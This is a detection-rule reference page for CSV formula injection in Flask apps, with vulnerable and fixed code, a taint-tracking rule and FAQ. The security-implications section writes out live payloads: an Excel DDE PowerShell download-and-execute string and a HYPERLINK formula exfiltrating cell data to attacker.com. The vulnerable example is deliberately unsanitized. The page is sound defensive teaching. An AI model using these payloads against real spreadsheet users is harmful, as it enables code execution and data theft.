# PYTHON-FLASK-SEC-009: Flask CSV Injection

> **Severity:** MEDIUM | **CWE:** CWE-1236 | **OWASP:** A03:2021

- **Language:** Python
- **Category:** Flask
- **URL:** https://codepathfinder.dev/registry/python/flask/PYTHON-FLASK-SEC-009
- **Detection:** `pathfinder scan --ruleset python/PYTHON-FLASK-SEC-009 --project .`

## Description

This rule detects CSV injection (also known as formula injection or spreadsheet
injection) in Flask applications where user-controlled input from HTTP request
parameters flows to csv.writer.writerow() or csv.writer.writerows() without
stripping spreadsheet formula trigger characters.

CSV files generated by Flask applications are frequently downloaded and opened
in Microsoft Excel, LibreOffice Calc, or Google Sheets. When a CSV cell value
begins with =, +, -, or @, spreadsheet applications interpret it as a formula
rather than data. An attacker who supplies a value like =HYPERLINK("http://evil.com","Click")
or =cmd|'/C calc'!A0 (the DDE payload for Excel) causes the formula to execute
when the victim opens the CSV file -- potentially launching applications, making
DNS lookups, or stealing data through the hyperlink callback.

The rule traces tainted data from Flask request sources through variable assignments
and function calls to the row data argument (position 0) of csv.writer.writerow() and
writerows(). Because the Python standard library has no sanitizer for CSV formula
injection, the fix requires explicit data validation: check whether the first character
of each string cell value is a formula trigger character and either reject the input or
prefix it with a single quote to prevent formula interpretation.


## Vulnerable Code

```python
from flask import Flask, request
import csv, io

app = Flask(__name__)

@app.route('/export')
def export_csv():
    name = request.args.get('name')
    output = io.StringIO()
    writer = csv.writer(output)
    # VULNERABLE: 'name' comes straight from the query string and is written unmodified
    writer.writerow([name, "data"])
    return output.getvalue()
```

## Secure Code

```python
from flask import Flask, request, Response
import csv
import io

app = Flask(__name__)

def sanitize_csv_field(value):
    """
    Prevent CSV formula injection by prefixing formula trigger characters.
    A leading =, +, -, or @ is treated as a formula starter by spreadsheet apps.
    A leading tab or carriage return is handled the same way.
    Prefixing with a tab character or single quote disarms the formula.
    """
    if isinstance(value, str) and value and value[0] in ('=', '+', '-', '@', '\t', '\r'):
        # Tab prefix: becomes part of the cell text, so the cell no longer starts with =, +, -, or @
        return '\t' + value
    return value

@app.route('/export')
def export_csv():
    name = request.args.get('name', '')
    email = request.args.get('email', '')

    output = io.StringIO()
    writer = csv.writer(output)
    writer.writerow(['Name', 'Email'])
    # SAFE: sanitize_csv_field() prefixes values that start with a formula trigger character
    writer.writerow([sanitize_csv_field(name), sanitize_csv_field(email)])

    response = Response(output.getvalue(), mimetype='text/csv')
    response.headers['Content-Disposition'] = 'attachment; filename=export.csv'
    return response

```
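
The example above sanitizes a single row. For bulk exports through writerows(), the same check can be applied to every cell before the rows reach the writer. The following is a minimal sketch, not part of the rule itself: `sanitize_cell` and `sanitize_rows` are hypothetical helper names, and the single-quote prefix is an assumption (it is one of the two prefixes this page mentions).

```python
import csv
import io

# Leading characters treated as formula triggers (same set as the example above).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

def sanitize_cell(value):
    """Prefix string cells that start with a formula trigger character."""
    if isinstance(value, str) and value.startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value  # non-strings and harmless strings pass through unchanged

def sanitize_rows(rows):
    """Yield each row with every cell passed through sanitize_cell()."""
    for row in rows:
        yield [sanitize_cell(cell) for cell in row]

rows = [["alice", "=1+1"], ["@bob", 42]]
output = io.StringIO()
csv.writer(output).writerows(sanitize_rows(rows))
print(output.getvalue())
```

Because `sanitize_rows` is a generator, large exports are sanitized row by row without building a second copy of the data in memory.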

## Detection Rule (Python SDK)

```python
from codepathfinder.python_decorators import python_rule
from codepathfinder import calls, flows, QueryType
from codepathfinder.presets import PropagationPresets

class CSVWriter(QueryType):
    fqns = ["csv.writer", "csv.DictWriter"]
    patterns = ["*Writer"]
    match_subclasses = True


@python_rule(
    id="PYTHON-FLASK-SEC-009",
    name="Flask CSV Injection",
    severity="MEDIUM",
    category="flask",
    cwe="CWE-1236",
    tags="python,flask,csv-injection,CWE-1236",
    message="User input flows to CSV writer. Sanitize by removing leading =, +, -, @ characters.",
    owasp="A03:2021",
)
def detect_flask_csv_injection():
    """Detects Flask request data flowing to csv.writer.writerow()."""
    return flows(
        from_sources=[
            calls("request.args.get"),
            calls("request.form.get"),
            calls("request.values.get"),
            calls("request.get_json"),
        ],
        to_sinks=[
            CSVWriter.method("writerow", "writerows").tracks(0),
            calls("writer.writerow"),
            calls("writer.writerows"),
            calls("csv.writer"),
        ],
        sanitized_by=[],
        propagates_through=PropagationPresets.standard(),
        scope="global",
    )
```

## How to Fix

- Before writing any user-supplied string value to a CSV row, check if the first character is =, +, -, or @ and either reject the input or prefix it with a tab character or single quote to prevent formula interpretation.
- Use the defusedcsv library (a drop-in replacement for Python's csv module) which automatically sanitizes formula injection characters.
- Validate user input at the point of collection (request parameter parsing) to reject inputs that begin with formula trigger characters if such characters are not valid for the field.
- Set the Content-Disposition: attachment header on CSV responses to prevent browsers from rendering them inline, ensuring they are downloaded as files.
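- Consider generating XLSX files using openpyxl instead of CSV -- XLSX stores each cell's type explicitly, so a value stored as a text cell is not evaluated as a formula. Note that openpyxl treats a Python string starting with = as a formula by default, so user-supplied values still need to be prefixed or have their cell type set to text explicitly.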

## Security Implications

- **Remote Code Execution via Excel DDE Formulas:** Excel's Dynamic Data Exchange (DDE) feature can be triggered via CSV formulas.
A payload like =cmd|'/C powershell -nop -c "iex(New-Object Net.WebClient).DownloadString(url)"'!A0
in a CSV cell executes arbitrary PowerShell when a victim opens the file in Excel
with DDE enabled. This is a client-side RCE delivered through a server-generated
CSV export endpoint.

- **Data Exfiltration via Hyperlink Callbacks:** The =HYPERLINK("http://attacker.com/exfil?data="&A1,"click") formula sends cell
contents from adjacent cells to the attacker's server when the victim clicks the
hyperlink or in some Excel versions when the file opens. User data, including other
exported fields in the same CSV row, can be exfiltrated this way.

- **Phishing via Deceptive Cell Content:** Formula injection can display deceptive content in cells that appears legitimate
when rendered: =IF(1,"Verified Account",""). An attacker exports a report that
appears to show "Verified Account" status for a row they control, manipulating
business decisions based on the fraudulent CSV export.

- **Persistence via External References:** Spreadsheet formulas can reference external workbooks: ='http://attacker.com/payload.xlsx'!A1.
When the victim opens the CSV, Excel may try to fetch the external workbook
(depending on version and link-update settings), contacting an attacker-controlled
server. This channel operates outside the Flask application after the initial CSV download.


## FAQ

**Q: CSV injection seems low severity. Why does this matter?**

CSV injection is client-side -- the actual exploit happens when the victim opens
the file in Excel or Calc, not on the server. This makes it easy to underestimate.
In practice, CSV exports from business applications contain sensitive data (user
lists, transaction records, financial reports) and are opened by executives,
accountants, and administrators -- high-value targets whose machines have access
to sensitive systems. A DDE payload in a CSV export from your Flask app is a
phishing vector with your application's credibility attached to it.


**Q: Does Python's csv module automatically escape formula characters?**

No. Python's csv module handles CSV syntax (quoting commas, newlines, quotes)
but has no concept of spreadsheet formula characters. It will write =DANGEROUS()
to a CSV cell exactly as provided. The sanitization must be done by the application
before passing values to csv.writer.
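
This behavior is easy to confirm with the standard library alone. The short sketch below writes a formula-like value next to a value containing a comma, then parses the line back the way a CSV importer would split it into cells:

```python
import csv
import io

output = io.StringIO()
csv.writer(output).writerow(["=DANGEROUS()", "a,b"])
written = output.getvalue()

# Parse the line back into cells, as a spreadsheet importer would.
cells = next(csv.reader(io.StringIO(written, newline="")))

print(repr(written))  # the comma-containing field is quoted, the formula is not altered
print(cells)
```

The csv module quotes the second field because it contains the delimiter, but the first cell still begins with = after parsing.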


**Q: What is the defusedcsv library and is it a drop-in replacement?**

defusedcsv is a wrapper around Python's csv module that automatically neutralizes
cells starting with formula trigger characters (=, +, -, @) by prefixing them with
a single quote. Per the project README it is a drop-in replacement: replace
import csv with from defusedcsv import csv and existing code works without changes.
It is the lowest-effort fix for this vulnerability.


**Q: Does prefixing with a tab break the CSV format?**

No. The file remains valid CSV, but the tab prefix (\t) becomes part of the cell
string when loaded in Excel or Calc. The cell displays as " value" with a leading
space (or tab, depending on rendering). For most export use cases this is acceptable.
For display-sensitive exports, a single quote prefix is the alternative. Whether the
quote is hidden or shown literally depends on the application and on how the file is
imported, so check the result in the spreadsheet application your users rely on.
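
To see what each prefix leaves in the cell data, a round trip through the csv module can help. This is a sketch under stated assumptions: `neutralize` and `round_trip` are hypothetical helper names, and the code shows only the parsed string, not how a particular spreadsheet application renders it.

```python
import csv
import io

TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

def neutralize(value, prefix="'"):
    """Prepend `prefix` to string values that start with a formula trigger."""
    if isinstance(value, str) and value.startswith(TRIGGERS):
        return prefix + value
    return value

def round_trip(cells):
    """Write one row with csv.writer and read it back with csv.reader."""
    buffer = io.StringIO()
    csv.writer(buffer).writerow(cells)
    buffer.seek(0)
    return next(csv.reader(buffer))

quoted = round_trip([neutralize("=1+1")])
tabbed = round_trip([neutralize("=1+1", prefix="\t")])
print(repr(quoted[0]), repr(tabbed[0]))
```

In both cases the prefix survives the round trip as ordinary cell content, which is why downstream consumers that parse the CSV programmatically will see it too.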


**Q: Which spreadsheet applications are affected?**

Microsoft Excel (all versions with DDE enabled), LibreOffice Calc (BASIC macros
via formulas), and Google Sheets (hyperlink formulas, some formula execution).
The exact capabilities vary by application version and configuration, but the
=HYPERLINK() exfiltration vector works across all three. Excel with DDE enabled
is the most dangerous target.


**Q: We validate that CSV exports only contain alphanumeric data for most fields. Is that enough?**

If every field that could contain user-supplied text is validated against a strict
allowlist that excludes =, +, -, and @ as leading characters, the injection vector
is closed for those fields. The rule only triggers on paths where tainted input
actually reaches csv.writer. If your validation happens before the data enters the
tainted flow, there should be no finding.
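
A strict allowlist of this kind might look like the sketch below. The pattern and the name `is_allowed` are illustrative assumptions, not something the rule requires. Adjust the character classes to what each field legitimately needs.

```python
import re

# First character must be alphanumeric; later characters may also be
# spaces, underscores, or dots. Formula triggers can never lead the value.
ALLOWED = re.compile(r"[A-Za-z0-9][A-Za-z0-9 _.]*")

def is_allowed(value):
    """Return True only if the whole value matches the allowlist pattern."""
    return isinstance(value, str) and ALLOWED.fullmatch(value) is not None

for candidate in ["Alice Smith", "=1+1", "@bob", ""]:
    print(repr(candidate), is_allowed(candidate))
```

Using fullmatch() rather than match() matters here: it rejects values that start out valid but contain disallowed characters later on.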


**Q: How do I test that my sanitization actually works?**

Supply =HYPERLINK("http://example.com","test") as a CSV field value through the
API or form, download the resulting CSV, and open it in Excel or LibreOffice Calc.
If the cell shows the literal text (with a leading tab or quote) rather than a
clickable hyperlink, the sanitization is effective. Also test =1+1 to verify
arithmetic formulas are not evaluated.
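
The manual check can be complemented by an automated one that scans the generated CSV text for cells that still start with a formula character. The following is a minimal sketch; `find_formula_cells` is a hypothetical helper, and the sample CSV strings are made up for illustration.

```python
import csv
import io

FORMULA_STARTERS = ("=", "+", "-", "@")

def find_formula_cells(csv_text):
    """Return (row, column, value) for each cell that starts with a formula character."""
    hits = []
    reader = csv.reader(io.StringIO(csv_text, newline=""))
    for row_index, row in enumerate(reader):
        for col_index, cell in enumerate(row):
            if cell.startswith(FORMULA_STARTERS):
                hits.append((row_index, col_index, cell))
    return hits

unsafe = 'Name,Email\r\n"=HYPERLINK(""http://example.com"",""test"")",a@example.com\r\n'
safe = "Name,Email\r\n'=1+1,a@example.com\r\n"

print(find_formula_cells(unsafe))
print(find_formula_cells(safe))
```

In a test suite, the CSV text would come from the export endpoint's response body. Note that this check also flags legitimate values such as negative numbers, so it suits fields that are expected to hold free text.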


## References

- [CWE-1236: Improper Neutralization of Formula Elements in a CSV File](https://cwe.mitre.org/data/definitions/1236.html)
- [OWASP CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection)
- [defusedcsv library](https://github.com/raphaelm/defusedcsv)
- [Python csv module documentation](https://docs.python.org/3/library/csv.html)
- [OWASP Input Validation Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html)
- [Microsoft Excel DDE security guidance](https://support.microsoft.com/en-us/office/security-considerations-for-using-dynamic-data-exchange-dde)
